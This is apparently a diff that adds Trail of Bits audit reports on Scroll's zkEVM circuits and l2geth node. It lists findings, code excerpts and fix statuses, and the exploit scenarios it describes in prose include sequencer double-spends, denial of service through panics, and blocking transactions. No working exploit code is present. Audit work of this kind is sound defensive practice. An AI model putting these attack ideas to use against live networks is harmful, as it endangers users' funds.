TOB-SCROLL2-1: PoseidonLookup is not implemented
Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed.

TOB-SCROLL2-2: IsZeroGadget does not constrain the inverse witness when the value is zero
Unresolved. The Scroll team has indicated that it does not intend to fix this issue.

TOB-SCROLL2-3: The MPT nonexistence proof gadget is missing constraints specified in the documentation
Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed.

TOB-SCROLL2-4: Discrepancies between the MPT circuit specification and implementation
Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed.

TOB-SCROLL2-5: Redundant lookups in the Word RLC circuit
Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed.

TOB-SCROLL2-6: The NonceChanged configuration circuit does not constrain the new nonce value
Resolved in PR #73. The two conditional constraints that referred to old_value instead of new_value have been factored out into a single unconditional constraint referring to new_value, and the ExtensionOld case has been removed entirely in favor of a blanket assertion forbidding that case of configure_nonce.

TOB-SCROLL2-7: The Copy circuit does not totally enforce the tag values
Partially resolved in PR #809. Several cases of the CopyDataType tag have been removed, and an assertion has been added to document that the Padding tag value is internal only. We did not fully evaluate whether this prevents tag values outside the expected range.

TOB-SCROLL2-8: The “invalid creation” error handling circuit is unconstrained
Resolved in PR #751. The MemoryMask gadget is used to extract the correct byte from the word at offset and to constrain it to equal 0xef.

TOB-SCROLL2-9: The OneHot primitive allows more than one value at once
Resolved in PR #69. Each binary column value v is constrained by enforcing 1 - v.or(!v) == 0. It is not immediately obvious that this constraint suffices, but it is equivalent to v * (1 - v) = 0 by the following reasoning:

1 - v.or(!v) == 1 - !((!v).and(!!v))
             == 1 - (1 - ((!v) * (!!v)))
             == ((1 - v) * (1 - (1 - v)))
             == (1 - v) * v

In addition, another related issue with the OneHot primitive, which was not discovered during the initial review engagement, was fixed in PR #68. The related problem was a typo causing OneHot::previous to return the result of the current row rather than the previous row. Its exploit scenario would be effectively the same as the one described in finding TOB-SCROLL2-9. The Scroll team fixed this by replacing the value BinaryColumn::current with BinaryColumn::previous.

TOB-SCROLL2-10: Intermediate columns are not explicit
Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed.
F. Fix Review Status Categories
The following table describes the statuses used to indicate whether an issue has been sufficiently addressed.

Fix Status
Undetermined: The status of the issue was not determined during this engagement.
Unresolved: The issue persists and has not been resolved.
Partially Resolved: The issue persists but has been partially resolved.
Resolved: The issue has been sufficiently resolved.

diff --git a/findings_newupdate/tob/2023-08-scrollL2geth-initial-securityreview.txt b/findings_newupdate/tob/2023-08-scrollL2geth-initial-securityreview.txt
new file mode 100644
index 0000000..cb63cd0
--- /dev/null
+++ b/findings_newupdate/tob/2023-08-scrollL2geth-initial-securityreview.txt
@@ -0,0 +1,17 @@
+2. Multiple instances of unchecked errors
Severity: Low
Difficulty: High
Type: Undefined Behavior
Finding ID: TOB-L2GETH-2
Targets: trie/zkproof/writer.go, trie/sync.go, trie/proof.go, trie/committer.go, trie/database.go

Description
There are multiple instances of unchecked errors in the l2geth codebase, which could lead to undefined behavior when errors are raised. One such unhandled error is shown in figure 2.1. A comprehensive list of unchecked errors is provided in appendix C.

if len(requests) == 0 && req.deps == 0 {
    s.commit(req)
} else {

Figure 2.1: The Sync.commit() function returns an error that is unhandled, which could lead to invalid commitments or a frozen chain. (go-ethereum/trie/sync.go#296–298)

Unchecked errors also make the system vulnerable to denial-of-service attacks; they could allow attackers to trigger nil dereference panics in the sequencer node.

Exploit Scenario
An attacker identifies a way to cause a zkTrie commitment to fail, allowing invalid data to be silently committed by the sequencer.

Recommendations
Short term, add error checks to all functions that can emit Go errors. Long term, add the tools errcheck and ineffassign to l2geth’s build pipeline. These tools can be used to detect errors and prevent builds containing unchecked errors from being deployed.
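For the case in figure 2.1, the short-term fix is simply to check the returned error; a sketch (the recovery action is an assumption, since the right behavior depends on the caller):

// Sketch only: propagate the commit error instead of silently dropping it.
// Whether to return, log, or abort the sync step is a design decision for
// the caller.
if len(requests) == 0 && req.deps == 0 {
    if err := s.commit(req); err != nil {
        return err
    }
} else {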
+3. Risk of double-spend attacks due to use of single-node Clique consensus without finality API
Severity: Medium
Difficulty: High
Type: Undefined Behavior
Finding ID: TOB-L2GETH-3
Target: N/A

Description
l2geth uses the proof-of-authority Clique consensus protocol, defined by EIP-225. This consensus type is not designed for single-node networks, and an attacker-controlled sequencer node may produce multiple conflicting forks of the chain to facilitate double-spend attacks. The severity of this finding is compounded by the fact that there is no API for an end user to determine whether their transaction has been finalized by L1, forcing L2 users to use ineffective block/time delays to determine finality.

Clique consensus was originally designed as a replacement for proof-of-work consensus for Ethereum testnets. It uses the same fork choice rule as Ethereum’s proof-of-work consensus; the fork with the highest “difficulty” should be considered the canonical fork. Clique consensus does not use proof-of-work and cannot update block difficulty using the traditional calculation; instead, block difficulty may be one of two values:

● “2” if the block was mined by the designated (in-turn) signer for the block height
● “1” if the block was mined by a non-designated signer for the block height

This means that in a network with only one authorized signer, all of the blocks and forks produced by the sequencer will have the same difficulty value, making it impossible for syncing nodes to determine which fork is canonical at the given block height. In a normal proof-of-work network, one of the proposed blocks will have a higher difficulty value, causing syncing nodes to re-organize and drop the block with the lower difficulty value. In a single-validator proof-of-authority network, neither block will be preferred, so each syncing node will simply prefer the first block it received. This finding is not unique to l2geth; it will be endemic to all L2 systems that have only one authorized sequencer.

Exploit Scenario
An attacker acquires control over l2geth’s centralized sequencer node. The attacker modifies the node to produce two forks: one fork containing a deposit transaction to a centralized exchange, and one fork with no such deposit transaction. The attacker publishes the first fork, and the centralized exchange picks up and processes the deposit transaction. The attacker continues to produce blocks on the second, private fork. Once the exchange processes the deposit, the attacker stops generating blocks on the public fork, generates an extra block to make the private fork longer than the public fork, then publishes the private fork to cause a re-organization across syncing nodes. This attack must be completed before the sequencer is required to publish a proof to L1.

Recommendations
Short term, add API methods and documentation to ensure that bridges and centralized exchanges query only for transactions that have been proved and finalized on the L1 network. Long term, decentralize the sequencer in such a way that a majority of sequencers must collude in order to successfully execute a double-spend attack. This design should be accompanied by a slashing mechanism to penalize sequencers that sign conflicting blocks.
+4. Improper use of panic
Severity: Low
Difficulty: Medium
Type: Denial of Service
Finding ID: TOB-L2GETH-4
Target: Various areas of the codebase

Description
l2geth overuses Go’s panic mechanism in lieu of Go’s built-in error propagation system, introducing opportunities for denial of service. Go has two primary methods through which errors can be reported or propagated up the call stack: the panic method and Go errors. The use of panic is not recommended, as it is unrecoverable: when an operation panics, the Go program is terminated and must be restarted. The use of panic creates a denial-of-service vector that is especially applicable to a centralized sequencer, as a restart of the sequencer would effectively halt the L2 network until the sequencer recovers.

Some example uses of panic are presented in figures 4.1 to 4.3. These do not represent an exhaustive list of panic statements in the codebase, and the Scroll team should investigate each use of panic in its modified code to verify whether it truly represents an unrecoverable error.

func sanityCheckByte32Key(b []byte) {
    if len(b) != 32 && len(b) != 20 {
        panic(fmt.Errorf("do not support length except for 120bit and 256bit now. data: %v len: %v", b, len(b)))
    }
}

Figure 4.1: The sanityCheckByte32Key function panics when a trie key does not match the expected size. This function may be called during the execution of certain RPC requests. (go-ethereum/trie/zk_trie.go#44–48)

func (s *StateAccount) MarshalFields() ([]zkt.Byte32, uint32) {
    fields := make([]zkt.Byte32, 5)
    if s.Balance == nil {
        panic("StateAccount balance nil")
    }
    if !utils.CheckBigIntInField(s.Balance) {
        panic("StateAccount balance overflow")
    }
    if !utils.CheckBigIntInField(s.Root.Big()) {
        panic("StateAccount root overflow")
    }
    if !utils.CheckBigIntInField(new(big.Int).SetBytes(s.PoseidonCodeHash)) {
        panic("StateAccount poseidonCodeHash overflow")
    }

Figure 4.2: The MarshalFields function panics when attempting to marshal an object that does not match certain requirements. This function may be called during the execution of certain RPC requests. (go-ethereum/core/types/state_account_marshalling.go#47–64)

func (t *ProofTracer) MarkDeletion(key []byte) {
    if path, existed := t.emptyTermPaths[string(key)]; existed {
        // copy empty node terminated path for final scanning
        t.rawPaths[string(key)] = path
    } else if path, existed = t.rawPaths[string(key)]; existed {
        // sanity check
        leafNode := path[len(path)-1]
        if leafNode.Type != zktrie.NodeTypeLeaf {
            panic("all path recorded in proofTrace should be ended with leafNode")
        }

Figure 4.3: The MarkDeletion function panics when the proof tracer contains a path that does not terminate in a leaf node. This function may be called when a syncing node attempts to process an invalid, malicious proof that an attacker has gossiped on the network. (go-ethereum/trie/zktrie_deletionproof.go#120–130)

Exploit Scenario
An attacker identifies an error path that terminates with a panic that can be triggered by a malformed RPC request or proof payload. The attacker leverages this issue to either disrupt the sequencer’s operation or prevent follower/syncing nodes from operating properly.

Recommendations
Short term, review all uses of panic that have been introduced by Scroll’s changes to go-ethereum. Ensure that these uses of panic truly represent unrecoverable errors, and if not, add error handling logic to recover from the errors. Long term, annotate all valid uses of panic with explanations for why the errors are unrecoverable and, if applicable, how to prevent the unrecoverable conditions from being triggered. l2geth’s code review process must also be updated to verify that this documentation exists for new uses of panic that are introduced later.
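As an illustration of the recommended direction, the check in figure 4.1 could return an error for its callers to handle instead of panicking; a sketch:

// Sketch only: returning an error lets RPC handlers reject a malformed key
// gracefully instead of terminating the node.
func sanityCheckByte32Key(b []byte) error {
    if len(b) != 32 && len(b) != 20 {
        return fmt.Errorf("unsupported key length, data: %v len: %v", b, len(b))
    }
    return nil
}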
(go-ethereum/trie/zkproof/writer.go#31–41) func NewZkTrieProofWriter(storage *types.StorageTrace) (*zktrieProofWriter, error) { underlayerDb := memorydb.New() zkDb := trie.NewZktrieDatabase(underlayerDb) accounts := make(map[common.Address]*types.StateAccount) // resuming proof bytes to underlayerDb for addrs, proof := range storage.Proofs { if n := resumeProofs(proof, underlayerDb); n != nil { addr := common.HexToAddress(addrs) if n.Type == zktrie.NodeTypeEmpty { accounts[addr] = nil } else if acc, err := types.UnmarshalStateAccount(n.Data()); err == nil { if bytes.Equal(n.NodeKey[:], addressToKey(addr)[:]) { accounts[addr] = acc Figure 5.2: The addressToKey function is consumed by NewZkTrieProofWriter, which will attempt to dereference the nil pointer and generate a system panic. (go-ethereum/trie/zkproof/writer.go#152–167) Recommendations Short term, modify addressToKey so that it either returns an error that its calling functions can propagate or, if the error is unrecoverable, panics instead of returning a nil pointer. Long term, update Scroll’s code review and style guidelines to reflect that errors must be propagated by Go’s error system or must halt the program by using panic.
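A minimal sketch of the error-propagating variant described in the short-term recommendation, reusing the identifiers from figure 5.1; the surrounding package, imports, and the %w wrapping style are assumptions, not the report's patch:

func addressToKey(addr common.Address) (*zkt.Hash, error) {
	var preImage zkt.Byte32
	copy(preImage[:], addr.Bytes())
	h, err := preImage.Hash()
	if err != nil {
		// Propagate the failure instead of logging and returning nil, so that
		// callers such as NewZkTrieProofWriter can handle it explicitly rather
		// than dereference a nil pointer.
		return nil, fmt.Errorf("hash failure for preimage %s: %w", hexutil.Encode(preImage[:]), err)
	}
	return zkt.NewHashFromBigInt(h), nil
}

NewZkTrieProofWriter would then check the returned error before comparing n.NodeKey against the key.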
+6. Risk of transaction pool admission denial of service Severity: Low Difficulty: Low Type: Denial of Service Finding ID: TOB-L2GETH-6 Target: core/tx_pool.go Description l2geth’s changes to the transaction pool include an ECDSA recovery operation at the beginning of the pool’s transaction validation logic, introducing a denial-of-service vector: an attacker could generate invalid transactions to exhaust the sequencer’s resources. l2geth adds an L1 fee that all L2 transactions must pay. To verify that an L2 transaction can afford the L1 fee, the transaction pool calls fees.VerifyFee(), as shown in figure 6.1. VerifyFee() performs an ECDSA recovery operation to determine the account that will pay the L1 fee, as shown in figure 6.2. ECDSA key recovery is an expensive operation that should be executed as late in the transaction validation process as possible in order to reduce the impact of denial-of-service attacks. func (pool *TxPool) add(tx *types.Transaction, local bool) (replaced bool, err error) { // If the transaction is already known, discard it hash := tx.Hash() if pool.all.Get(hash) != nil { log.Trace("Discarding already known transaction", "hash", hash) knownTxMeter.Mark(1) return false, ErrAlreadyKnown } // Make the local flag. If it's from local source or it's from the network but // the sender is marked as local previously, treat it as the local transaction. isLocal := local || pool.locals.containsTx(tx) if pool.chainconfig.Scroll.FeeVaultEnabled() { if err := fees.VerifyFee(pool.signer, tx, pool.currentState); err != nil { Figure 6.1: TxPool.add() calls fees.VerifyFee() before any other transaction validators are called. (go-ethereum/core/tx_pool.go#684–697) func VerifyFee(signer types.Signer, tx *types.Transaction, state StateDB) error { from, err := types.Sender(signer, tx) if err != nil { return errors.New("invalid transaction: invalid sender") } Figure 6.2: VerifyFee() initiates an ECDSA recovery operation via types.Sender(). (go-ethereum/rollup/fees/rollup_fee.go#198–202) Exploit Scenario An attacker generates a denial-of-service attack against the sequencer by submitting extraordinarily large transactions. Because ECDSA recovery is a CPU-intensive operation and is executed before the transaction size is checked, the attacker is able to exhaust the memory resources of the sequencer. Recommendations Short term, modify the code to check for L1 fees in the TxPool.validateTx() function immediately after that function calls types.Sender(). This will ensure that other, less expensive-to-check validations are performed before the ECDSA signature is recovered. Long term, exercise caution when making changes to code paths that validate information received from public sources or gossip. For changes to the transaction pool, a good general rule of thumb is to validate transaction criteria in the following order:
1. Simple, in-memory criteria that do not require disk reads or data manipulation
2. Criteria that require simple, in-memory manipulations of the data, such as checks of the transaction size
3. Criteria that require an in-memory state trie to be checked
4. ECDSA recovery operations
5. Criteria that require an on-disk state trie to be checked
However, note that sometimes these criteria must be checked out of order; for example, the ECDSA recovery operation to identify the origin account may need to be performed before the state trie is checked to determine whether the account can afford the transaction.
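To make this ordering concrete, the following sketch rearranges a validateTx-style function along the steps above; it reuses identifiers from figures 6.1 and 6.2 and from geth's transaction pool, but it elides most checks and is illustrative rather than a drop-in patch:

func (pool *TxPool) validateTx(tx *types.Transaction, local bool) error {
	// Steps 1–2: cheap, in-memory criteria first, such as the transaction size.
	if uint64(tx.Size()) > txMaxSize {
		return ErrOversizedData
	}
	if tx.Value().Sign() < 0 {
		return ErrNegativeValue
	}
	// ... other inexpensive checks ...

	// Step 4: only now pay for the ECDSA recovery.
	from, err := types.Sender(pool.signer, tx)
	if err != nil {
		return ErrInvalidSender
	}
	// Verify the L1 fee immediately after recovery, per the short-term
	// recommendation, before any expensive state lookups.
	if pool.chainconfig.Scroll.FeeVaultEnabled() {
		if err := fees.VerifyFee(pool.signer, tx, pool.currentState); err != nil {
			return err
		}
	}

	// Step 5: state-dependent criteria, such as the nonce, come last.
	if pool.currentState.GetNonce(from) > tx.Nonce() {
		return ErrNonceTooLow
	}
	return nil
}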
+7. Syncing nodes fail to check consensus rule for L1 message count Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-L2GETH-7 Target: core/block_validator.go Description l2geth adds a consensus rule requiring that there be no more than L1Config.NumL1MessagesPerBlock L1 messages per L2 block. This rule is checked by the sequencer when building new blocks, but it is not checked by syncing nodes in the ValidateL1Messages function, as shown in figure 7.1. // TODO: consider adding a rule to enforce L1Config.NumL1MessagesPerBlock. // If there are L1 messages available, sequencer nodes should include them. // However, this is hard to enforce as different nodes might have different views of L1. Figure 7.1: The ValidateL1Messages function does not check the NumL1MessagesPerBlock restriction. (go-ethereum/core/block_validator.go#145–147) The TODO comment shown in the figure expresses a concern that syncing nodes cannot enforce NumL1MessagesPerBlock because different nodes may have different views of L1; however, this concern does not prevent syncing nodes from simply counting the L1 messages included in the block. Exploit Scenario A malicious sequencer ignores the NumL1MessagesPerBlock restriction while constructing a block, thus bypassing the consensus rules. Follower nodes consider the block to be valid even though the consensus rule is violated. Recommendations Short term, add a check to ValidateL1Messages that enforces the maximum number of L1 messages per block. Long term, document and check all changes to the system’s consensus rules to ensure that both nodes that construct blocks and nodes that sync blocks check the consensus rules. This includes having syncing nodes check whether an L1 transaction actually exists on the L1, a concern expressed in comments further up in the ValidateL1Messages function.
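A sketch of the missing check; it reuses the IsL1MessageTx helper that appears elsewhere in the fork, while the function name and the way the limit is passed in are assumptions for illustration:

func validateL1MessageCount(block *types.Block, numL1MessagesPerBlock uint64) error {
	var count uint64
	for _, tx := range block.Transactions() {
		if tx.IsL1MessageTx() {
			count++
		}
	}
	// Counting messages requires no view of L1 at all, so every syncing node
	// can enforce the cap regardless of its own L1 state.
	if count > numL1MessagesPerBlock {
		return fmt.Errorf("block %d contains %d L1 messages; the limit is %d", block.NumberU64(), count, numL1MessagesPerBlock)
	}
	return nil
}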
A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document.
Vulnerability Categories
Access Controls: Insufficient authorization or assessment of rights
Auditing and Logging: Insufficient auditing of actions or logging of problems
Authentication: Improper identification of users
Configuration: Misconfigured servers, devices, or software components
Cryptography: A breach of system confidentiality or integrity
Data Exposure: Exposure of sensitive information
Data Validation: Improper reliance on the structure or values of data
Denial of Service: A system failure with an availability impact
Error Reporting: Insecure or insufficient reporting of error conditions
Patching: Use of an outdated software package or library
Session Management: Improper identification of authenticated users
Testing: Insufficient test methodology or test coverage
Timing: Race conditions or other order-of-operations flaws
Undefined Behavior: Undefined behavior triggered within the system
Severity Levels
Informational: The issue does not pose an immediate risk but is relevant to security best practices.
Undetermined: The extent of the risk was not determined during this engagement.
Low: The risk is small or is not one the client has indicated is important.
Medium: User information is at risk; exploitation could pose reputational, legal, or moderate financial risks.
High: The flaw could affect numerous users and have serious reputational, legal, or financial implications.
Difficulty Levels
Undetermined: The difficulty of exploitation was not determined during this engagement.
Low: The flaw is well known; public tools for its exploitation exist or can be scripted.
Medium: An attacker must write an exploit or will need in-depth knowledge of the system.
High: An attacker must have privileged access to the system, may need to know complex technical details, or must discover other weaknesses to exploit this issue.
B. Code Maturity Categories The following tables describe the code maturity categories and rating criteria used in this document.
Code Maturity Categories
Arithmetic: The proper use of mathematical operations and semantics
Auditing: The use of event auditing and logging to support monitoring
Authentication / Access Controls: The use of robust access controls to handle identification and authorization and to ensure safe interactions with the system
Complexity Management: The presence of clear structures designed to manage system complexity, including the separation of system logic into clearly defined functions
Cryptography and Key Management: The safe use of cryptographic primitives and functions, along with the presence of robust mechanisms for key generation and distribution
Decentralization: The presence of a decentralized governance structure for mitigating insider threats and managing risks posed by contract upgrades
Documentation: The presence of comprehensive and readable codebase documentation
Transaction Ordering Risks: The system’s resistance to transaction re-ordering attacks
Memory Safety and Error Handling: The presence of memory safety and robust error-handling mechanisms
Low-Level Manipulation: The justified use of inline assembly and low-level calls
Testing and Verification: The presence of robust testing procedures (e.g., unit tests, integration tests, and verification methods) and sufficient test coverage
Rating Criteria
Strong: No issues were found, and the system exceeds industry standards.
Satisfactory: Minor issues were found, but the system is compliant with best practices.
Moderate: Some issues that may affect system safety were found.
Weak: Many issues that affect system safety were found.
Missing: A required component is missing, significantly affecting system safety.
Not Applicable: The category is not applicable to this review.
Not Considered: The category was not considered in this review.
Further Investigation Required: Further investigation is required to reach a meaningful conclusion.
C. Unchecked Errors List The following table lists the various unhandled Go errors, as reported in finding TOB-L2GETH-2.
trie/zkproof/writer.go, line 226: underlayerDb.Put()
trie/zkproof/writer.go, line 57: db.Put()
trie/sync.go, line 297: s.commit()
trie/sync.go, line 279: s.commit()
trie/proof.go, line 567: tr.TryUpdate()
trie/proof.go, line 497: tr.TryUpdate()
trie/proof.go, line 86: proofDb.Put()
trie/committer.go, line 229: c.onleaf()
trie/committer.go, line 235: c.onleaf()
trie/committer.go, line 245: c.sha.Write()
trie/committer.go, line 256: c.sha.Read()
trie/database.go, line 581: db.preimages.commit()
trie/database.go, line 659: batch.Put()
trie/database.go, line 676: db.preimages.commit()
trie/database.go, line 695: batch.Replay()
trie/database.go, line 743: batch.Replay()
trie/database.go, line 850: db.saveCache()
D. Code Quality Findings This appendix contains findings that do not have immediate or obvious security implications. However, they may facilitate exploit chains targeting other vulnerabilities or become easily exploitable in future releases.
● Avoid the use of magic values. The use of hard-coded magic values within code introduces ambiguity because they lack clear context, making it challenging for developers/auditors to understand their purpose and significance. By using variables or constants, meaningful names can be provided to these values, offering self-documentation and improving code comprehension. func toWordSize(size uint64) uint64 { if size > math.MaxUint64-31 { return math.MaxUint64/32 + 1 } return (size + 31) / 32 } Figure D.1: go-ethereum/core/state_transition.go#173–179 func IterateL1MessagesFrom(db ethdb.Iteratee, fromQueueIndex uint64) L1MessageIterator { start := encodeQueueIndex(fromQueueIndex) it := db.NewIterator(l1MessagePrefix, start) keyLength := len(l1MessagePrefix) + 8 Figure D.2: go-ethereum/core/rawdb/accessors_l1_message.go#108–112
● Remove redundant code. Clean up the redundant code related to handling uncle blocks and forks, as the codebase does not recognize or produce uncle blocks. Removing this unnecessary functionality will simplify the code, making it easier to understand and maintain.
● Address TODO statements or create tickets for them. TODO statements should remain in a codebase only while the codebase is in a pre-release state. Address TODO statements that can be addressed immediately; for those that cannot be addressed before production deployment, create tickets to ensure that they are prioritized.
● Use feature flags to control network behavior instead of using reflection or magic hashes. Some features in l2geth use reflection or the presence of a specific hash in a database to determine whether certain features are enabled, as in the VerifyProof function, shown in figure D.3. Feature flags provide a better, more unified interface to enable or disable specific features or functionality. If a function needs to operate in multiple, simultaneous modes, an encapsulating function should be used to make it clear that the behavior is not specific to a network feature.
func VerifyProof(rootHash common.Hash, key []byte, proofDb ethdb.KeyValueReader) (value []byte, err error) { // test the type of proof (for trie or SMT) if buf, _ := proofDb.Get(magicHash); buf != nil { return VerifyProofSMT(rootHash, key, proofDb) } key = keybytesToHex(key) wantHash := rootHash for i := 0; ; i++ { Figure D.3: The VerifyProof function uses the presence of a magic hash to determine what kind of proof to verify. (go-ethereum/trie/proof.go#106–115) diff --git a/findings_newupdate/tob/2023-08-scrollL2geth-securityreview.txt b/findings_newupdate/tob/2023-08-scrollL2geth-securityreview.txt new file mode 100644 index 0000000..5803815 --- /dev/null +++ b/findings_newupdate/tob/2023-08-scrollL2geth-securityreview.txt @@ -0,0 +1,5 @@ +1. Attacker can prevent L2 transactions from being added to a block Severity: High Difficulty: Low Type: Denial of Service Finding ID: TOB-L2GETH-1 Target: miner/worker.go Description The commitTransactions function returns a flag that determines whether to halt transaction production, even if the block has room for more transactions to be added. If the circuit checker returns an error either for row consumption being too high or reasons unknown, the circuitCapacityReached flag is set to true (figure 1.1). case (errors.Is(err, circuitcapacitychecker.ErrTxRowConsumptionOverflow) && tx.IsL1MessageTx()): // Circuit capacity check: L1MessageTx row consumption too high, shift to the next from the account, // because we shouldn't skip the entire txs from the same account. // This is also useful for skipping "problematic" L1MessageTxs. queueIndex := tx.AsL1MessageTx().QueueIndex log.Trace("Circuit capacity limit reached for a single tx", "tx", tx.Hash().String(), "queueIndex", queueIndex) log.Info("Skipping L1 message", "queueIndex", queueIndex, "tx", tx.Hash().String(), "block", w.current.header.Number, "reason", "row consumption overflow") w.current.nextL1MsgIndex = queueIndex + 1 // after `ErrTxRowConsumptionOverflow`, ccc might not revert updates // associated with this transaction so we cannot pack more transactions. // TODO: fix this in ccc and change these lines back to `txs.Shift()` circuitCapacityReached = true break loop case (errors.Is(err, circuitcapacitychecker.ErrTxRowConsumptionOverflow) && !tx.IsL1MessageTx()): // Circuit capacity check: L2MessageTx row consumption too high, skip the account. // This is also useful for skipping "problematic" L2MessageTxs. log.Trace("Circuit capacity limit reached for a single tx", "tx", tx.Hash().String()) // after `ErrTxRowConsumptionOverflow`, ccc might not revert updates // associated with this transaction so we cannot pack more transactions. // TODO: fix this in ccc and change these lines back to `txs.Pop()` circuitCapacityReached = true break loop case (errors.Is(err, circuitcapacitychecker.ErrUnknown) && tx.IsL1MessageTx()): // Circuit capacity check: unknown circuit capacity checker error for L1MessageTx, // shift to the next from the account because we shouldn't skip the entire txs from the same account queueIndex := tx.AsL1MessageTx().QueueIndex log.Trace("Unknown circuit capacity checker error for L1MessageTx", "tx", tx.Hash().String(), "queueIndex", queueIndex) log.Info("Skipping L1 message", "queueIndex", queueIndex, "tx", tx.Hash().String(), "block", w.current.header.Number, "reason", "unknown row consumption error") w.current.nextL1MsgIndex = queueIndex + 1 // after `ErrUnknown`, ccc might not revert updates associated // with this transaction so we cannot pack more transactions. 
// TODO: fix this in ccc and change these lines back to `txs.Shift()` circuitCapacityReached = true break loop case (errors.Is(err, circuitcapacitychecker.ErrUnknown) && !tx.IsL1MessageTx()): // Circuit capacity check: unknown circuit capacity checker error for L2MessageTx, skip the account log.Trace("Unknown circuit capacity checker error for L2MessageTx", "tx", tx.Hash().String()) // after `ErrUnknown`, ccc might not revert updates associated // with this transaction so we cannot pack more transactions. // TODO: fix this in ccc and change these lines back to `txs.Pop()` circuitCapacityReached = true break loop Figure 1.1: Error handling for the circuit capacity checker (worker.go#L1073-L1121) When this flag is set to true, no new transactions will be added even if there is room for additional transactions in the block (figure 1.2). // Fill the block with all available pending transactions. pending := w.eth.TxPool().Pending(true) // Short circuit if there is no available pending transactions. // But if we disable empty precommit already, ignore it. Since // empty block is necessary to keep the liveness of the network. if len(pending) == 0 && pendingL1Txs == 0 && atomic.LoadUint32(&w.noempty) == 0 { w.updateSnapshot() return } // Split the pending transactions into locals and remotes localTxs, remoteTxs := make(map[common.Address]types.Transactions), pending for _, account := range w.eth.TxPool().Locals() { if txs := remoteTxs[account]; len(txs) > 0 { delete(remoteTxs, account) localTxs[account] = txs } } var skipCommit, circuitCapacityReached bool if w.chainConfig.Scroll.ShouldIncludeL1Messages() && len(l1Txs) > 0 { log.Trace("Processing L1 messages for inclusion", "count", pendingL1Txs) txs := types.NewTransactionsByPriceAndNonce(w.current.signer, l1Txs, header.BaseFee) skipCommit, circuitCapacityReached = w.commitTransactions(txs, w.coinbase, interrupt) if skipCommit { return } } if len(localTxs) > 0 && !circuitCapacityReached { txs := types.NewTransactionsByPriceAndNonce(w.current.signer, localTxs, header.BaseFee) skipCommit, circuitCapacityReached = w.commitTransactions(txs, w.coinbase, interrupt) if skipCommit { return } } if len(remoteTxs) > 0 && !circuitCapacityReached { txs := types.NewTransactionsByPriceAndNonce(w.current.signer, remoteTxs, header.BaseFee) // don't need to get `circuitCapacityReached` here because we don't have further `commitTransactions` // after this one, and if we assign it won't take effect (`ineffassign`) skipCommit, _ = w.commitTransactions(txs, w.coinbase, interrupt) if skipCommit { return } } // do not produce empty blocks if w.current.tcount == 0 { return } w.commit(uncles, w.fullTaskHook, true, tstart) Figure 1.2: Pending transactions are not added if the circuit capacity has been reached. (worker.go#L1284-L1332) Exploit Scenario Eve, an attacker, sends an L2 transaction that uses ecrecover many times. The transaction is submitted to the mempool with a gas price high enough to be ordered as the first L2 transaction in the block. Because it causes an error in the circuit checker, it prevents all other L2 transactions from being executed in this block. Recommendations Short term, implement a snapshotting mechanism in the circuit checker to roll back unexpected changes made as a result of incorrect or incomplete computation. Long term, analyze and document all impacts of error handling across the system to ensure that these errors are handled gracefully. Additionally, clearly document all expected invariants of the system's behavior to ensure that they hold in its interactions with other components.
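One possible shape for the short-term recommendation is a snapshot/revert interface on the circuit capacity checker, so that a failed check can be rolled back and the miner can keep using txs.Shift()/txs.Pop(), as the TODO comments intend; every name in this sketch is hypothetical:

type snapshottingCCC interface {
	Snapshot() int
	RevertToSnapshot(id int)
	ApplyTransaction(tx *types.Transaction) (rowsUsed uint64, err error)
}

func tryApplyTx(ccc snapshottingCCC, tx *types.Transaction) (uint64, error) {
	snap := ccc.Snapshot()
	rows, err := ccc.ApplyTransaction(tx)
	if err != nil {
		// Discard any partial row accounting left behind by the failed check,
		// so one problematic transaction cannot poison the rest of the block.
		ccc.RevertToSnapshot(snap)
		return 0, err
	}
	return rows, nil
}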
+2. Unused and dead code Severity: Informational Difficulty: N/A Type: Undefined Behavior Finding ID: TOB-L2GETH-2 Target: Throughout the code Description Due to the network's infrastructure and its single-node Clique setup, this fork of geth contains a significant amount of unused logic. Continuing to maintain this code can be problematic and may lead to issues. The following are examples of unused and dead code: ● Uncle blocks—with a single-node Clique network, there is no chance for uncle blocks to exist, so all of the logic that handles and interacts with uncle blocks can be dropped. ● Redundant logic around updating the L1 queue index ● A redundant check on empty blocks in the worker.go file Recommendations Short term, remove anything that is no longer relevant for the current go-ethereum implementation, and be sure to document all of the changes to the codebase. Long term, remove all unused code from the codebase.
+3. Lack of documentation Severity: Informational Difficulty: N/A Type: Unexpected Behavior Finding ID: TOB-L2GETH-3 Target: miner/worker.go Description Certain areas of the codebase lack documentation, high-level descriptions, and examples, which makes the code difficult to review and increases the likelihood of user mistakes. Areas that would benefit from being expanded and clarified in code and documentation include the following: ● Internals of the CCC. Despite being treated as a black box, the code relies on stateful changes made from geth calls. This suggests that the internal states of the miner's work and the CCC overlap. The lack of documentation regarding these states creates a lack of visibility in evaluating whether there are potential state corruptions or unexpected behavior. ● Circumstances where transactions are skipped and how they are expected to be handled. During the course of the review, we attempted to reverse engineer the intended behavior of transactions considered skipped by the CCC. The lack of documentation in these areas results in unclear expectations for this code. ● Error handling standards throughout the system. The codebase handles system errors differently—in some cases, logging an error and continuing execution or logging traces. Listing all instances where errors are identified and documenting how they are handled can help ensure that there is no unexpected behavior related to error handling. The documentation should include all expected properties and assumptions relevant to the aforementioned aspects of the codebase. Recommendations Short term, review and properly document the aforementioned aspects of the codebase. In addition to external documentation, NatSpec and inline code comments could help clarify complexities. Long term, consider writing a formal specification of the protocol. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document.
Vulnerability Categories
Access Controls: Insufficient authorization or assessment of rights
Auditing and Logging: Insufficient auditing of actions or logging of problems
Authentication: Improper identification of users
Configuration: Misconfigured servers, devices, or software components
Cryptography: A breach of system confidentiality or integrity
Data Exposure: Exposure of sensitive information
Data Validation: Improper reliance on the structure or values of data
Denial of Service: A system failure with an availability impact
Error Reporting: Insecure or insufficient reporting of error conditions
Patching: Use of an outdated software package or library
Session Management: Improper identification of authenticated users
Testing: Insufficient test methodology or test coverage
Timing: Race conditions or other order-of-operations flaws
Undefined Behavior: Undefined behavior triggered within the system
Severity Levels
Informational: The issue does not pose an immediate risk but is relevant to security best practices.
